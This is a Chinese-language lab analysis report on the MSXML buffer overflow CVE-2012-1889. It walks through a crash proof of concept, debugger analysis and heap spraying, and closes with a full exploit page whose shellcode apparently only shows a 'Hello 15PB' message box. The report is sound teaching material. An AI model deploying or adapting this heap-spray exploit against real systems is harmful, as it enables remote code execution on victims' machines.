Microsoft XML Core Services緩衝區溢出漏洞（CVE-2012-1889）漏洞分析報告

軟件名稱： Microsoft XML Core Services

軟件版本：XML 3.0/4.0/5.0/6.0

漏洞模塊：msxml3.dll.

實驗系統：windows xp sp3

漏洞影響系統：windows XP/7/8/8.1

漏洞編號：CVE-2012-1889

危害等級：高危

漏洞類型：緩衝區溢出

威脅類型：遠程

1. 軟件簡介

    Microsoft XML Core Services (MSXML)是一組服務，可用JScript、VBScript、Microsoft開發工具編寫的應用構建基於XML的Windows-native應用。 

1. 漏洞成因

據CVE-2012-1889描述，Microsoft XML Core Services中的漏洞可能允許遠程執行代碼。微軟公司將該漏洞編號爲MS12-043，其描述是：“Microsoft XML Core Services處理內存中的對象的方式中存在一個遠程執行代碼漏洞。如果用戶查看包含特製內容的網站，則該漏洞可能允許遠程執行代碼。成功利用此漏洞的攻擊者可以完全控制受影響的系統。攻擊者可隨後安裝程序；查看、更改或刪除數據；或者創建擁有完全用戶權限的新帳戶。那些帳戶被配置爲擁有較少系統用戶權限的用戶比具有管理用戶權限的用戶受到的影響要小。”

1. 利用過程

3.1漏洞觸發

1.Poc，網絡上流傳的POC代碼如下

<html>

<head>

    <title>CVE 2012-1889 PoC</title>

</head>

<body>

    <object classid="clsid:f6D90f11-9c73-11d3-b32e-00C04f990bb4" id='poc'></object>

    <script>

        var obj = document.getElementById('poc').object;

        var src = unescape("%u0c0c%u0c0c");

        while (src.length < 0x1002) src += src;

        src = "\\\\xxx" + src;

        src = src.substr(0, 0x1000 - 10);

        var pic = document.createElement("img");

        pic.src = src;

        pic.nameProp;

        obj.definition(0);

    </script>

</body>

</html>

2.將上面的代碼保存爲HTML文件，並且用IE6打開，並且在警告欄上允許允許阻止的內容，這時候IE瀏覽器就會崩潰

 

觸發漏洞的代碼是JavaScript中最後一句，即第16行的obj.definition(0)。definition是DOM對象的一個屬性，而且是隻讀的屬性，不可以把屬性當作函數來使用並往裏面傳遞參數。

此時再次用IE打開這個網頁，先不允許運行，先用windbg附加上去

 

輸入g讓程序跑起來，然後把警告的內容運行執行，讓程序觸發異常，斷在異常處。

 

在執行ecx，dword ptr[eax]的時候，eax的值是0x0C0C0C0C，在0x0C0C0C0C的位置上，並不可讀，所以觸發了一個異常訪問的異常，eax的值來自於ebp-14h內存處的值，在執行完對eax的賦值操作之後，程序比較了eax和ebx寄存器的內容，如果eax的內容爲0就會跳轉，越過觸發異常的代碼，但是PoC代碼在棧上產生了大量的0c0c字節，於是eax不爲0，跳轉也不會執行。

如果要執行代碼，就需要修改EIP寄存器的內容，call dword ptr [ecx+18h]處，這個地方剛好夠我們轉移EIP。

如果0x0C0C0C0C處存在可以讀的內存，那麼就不會觸發訪問異常的情況了，程序就會跳轉到0x0C0C0C0C+0x18處執行代碼，如果在這裏放上我們構建好的代碼，那麼漏洞觸發時，就可以執行了

3.2 HeapSpray

在使用HeapSpray的時候，一般會將EIP指向0x0C0C0C0C的位置上，然後利用JavaScript申請大量堆內存，並且用包含0x90和shellcode的內存覆蓋這些內存，通常，JavaScript會從內存的低地址向高地址分配內存，因此申請的內存超過200MB（200MB = 200*1024*1024 = 0x0C800000 > 0x0C0C0C0C）後，0x0C0C0C0C將被含有ShellCode的內存片覆蓋。只要內存片中的0×90能夠命中0x0C0C0C0C的位置，ShellCode就能最終得到執行。

3.1.1內存覆蓋代碼

1 2 3 4 5 6 7 8 9

var nop = "\u9090\u9090"; while (nop.length < 0x100000/2){     nop += nop; } nop = nop.substring(0, 0x100000/2 - 32/2 - 4/2 - shellcode.length - 2/2); var slide = new Array(); for (var i = 0; i < 200; i++){     slide[i] = nop + shellcode; }

上面的代碼分配了200個1M大小的內存塊，每個內存塊由shellcode和大量滑板指令0x90構成，其中shellcode位於每個內存塊的最末尾部分。

在觸發漏洞時，只需要有任意一個內存塊的任意一個滑板指令NOP可以覆蓋在0c0C0C0C0C上面，Shellcode最終都會被執行，使用1M作爲內存塊的單位，可以使覆蓋成功的機率增加，如果尺寸太小，0x0C0C0C0C的位置可能會被Shellcode所覆蓋，這樣的話，溢出就失敗了。

3.3 漏洞攻擊實驗

 

 

1. PoC

 <html>

<head>

    <title>CVE 2012-1889 PoC v3 By:15PB.Com</title>

</head>

<body>

    <object classid="clsid:f6D90f11-9c73-11d3-b32e-00C04f990bb4" id='15PB'></object>

    <script>

    // 1.  準備好Shellcode（unescape()是解碼函數）

var cShellcode = unescape(

"\u8360\u20EC\u4CEB\u6547\u5074\u6F72\u4163\u6464" +

"\u6572\u7373\u6F4C\u6461\u694C\u7262\u7261\u4579" +

"\u4178\u5500\u6573\u3372\u2E32\u6C64\u006C\u654D" +

"\u7373\u6761\u4265\u786F\u0041\u7845\u7469\u7250" +

"\u636F\u7365\u0073\u6548\u6C6C\u206F\u3531\u4250" +

"\u0021\u00E8\u0000\u5B00\u8B64\u3035\u0000\u8B00" +

"\u0C76\u768B\u8B1C\u8B36\u0856\u5253\u12E8\u0000" +

"\u8B00\u8DF0\uBD4B\u5251\uD0FF\u5653\u5250\u6EE8" +

"\u0000\u5500\uEC8B\uEC83\u520C\u558B\u8B08\u3C72" +

"\u348D\u8B32\u7876\u348D\u8B32\u1C7E\u3C8D\u893A" +

"\uFC7D\u7E8B\u8D20\u3A3C\u7D89\u8BF8\u247E\u3C8D" +

"\u893A\uF47D\uC033\u01EB\u8B40\uF875\u348B\u8B86" +

"\u0855\u348D\u8B32\u0C5D\u7B8D\uB9AF\u000E\u0000" +

"\uF3FC\u75A6\u8BE3\uF475\uFF33\u8B66\u463C\u558B" +

"\u8BFC\uBA34\u558B\u8D08\u3204\u8B5A\u5DE5\u08C2" +

"\u5500\uEC8B\uEC83\u8B08\u145D\u4B8D\u6ACC\u6A00" +

"\u5100\u55FF\u8D0C\uD74B\u5051\u55FF\u8910\uFC45" +

"\u4B8D\u51E3\u75FF\uFF08\u1055\u4589\u8DF8\uEF4B" +

"\u006A\u5151\u006A\u55FF\u6AFC\uFF00\uF855\uE58B" +

"\uC25D\u0010\u0000");

// 2.  製作一塊劃板數據

// 2.1 計算填充劃板指令數據的大小（都除2是因爲length返回的是Unicode的字符個數）

var nSlideSize      = 1024*1024 / 2;     // 一個劃板指令區的大小（1MB）

var nMlcHadSize     = 32        / 2;     // 堆頭部大小

var nStrLenSize     = 4         / 2;     // 堆長度信息大小

var nTerminatorSize = 2         / 2;     // 堆結尾符號大小

var nScSize         = cShellcode.length; // Shellcode大小

var nFillSize       = nSlideSize-nMlcHadSize-nStrLenSize-nScSize-nTerminatorSize;

// 2.2 填充劃板指令，製作好一塊填充數據

var cFillData  = unescape("\u0C0C\u0C0C"); // 劃板指令0C0C   OR AL,0C

var cSlideData = new Array();              // 申請一個數組對象用於保存劃板數據

while (cFillData.length <= nSlideSize)

cFillData += cFillData;

cFillData = cFillData.substring(0, nFillSize);

// 3.  填充200MB的內存區域（申請200塊1MB大小的劃板數據區），試圖覆蓋0x0C0C0C0C

//     區域，每塊劃板數據均由 劃板數據+Shellcode組成，這樣只要任意一塊劃板數據

//     正好落在0x0C0C0C0C處，大量無用的“OR AL,0C”就會將執行流程引到劃板數據區

//     後面的Shellcode處，進而執行Shellcode。

for (var i = 0; i < 200; i++)

cSlideData[i] = cFillData + cShellcode;

    // 4.  觸發CVE 2012-1889漏洞

// 4.1 獲取名爲15PB的XML對象，並將其保存到名爲obj15PB實例中

        var obj15PB = document.getElementById('15PB').object;

// 4.2 構建一個長度爲0x1000-10=8182，起始內容爲“\\15PB_Com”字節的數據

        var srcImgPath = unescape("\u0C0C\u0C0C");

        while (srcImgPath.length < 0x1000)

            srcImgPath += srcImgPath;

        srcImgPath = "\\\\15PB_Com" + srcImgPath;

        srcImgPath = srcImgPath.substr(0, 0x1000-10);

        // 4.3 創建一個圖片元素，並將圖片源路徑設爲srcImgPath，並返回當前圖片文件名

        var emtPic = document.createElement("img");

        emtPic.src = srcImgPath;

        emtPic.nameProp;

        // 4.4 定義對象obj15PB（觸發溢出）

        obj15PB.definition(0);

    </script>

</body>

</html>

5.參考資料

CSDN博客

《軟件調試》張銀奎 著

《0day安全：軟件漏洞分析技術（第2版）》 王清 著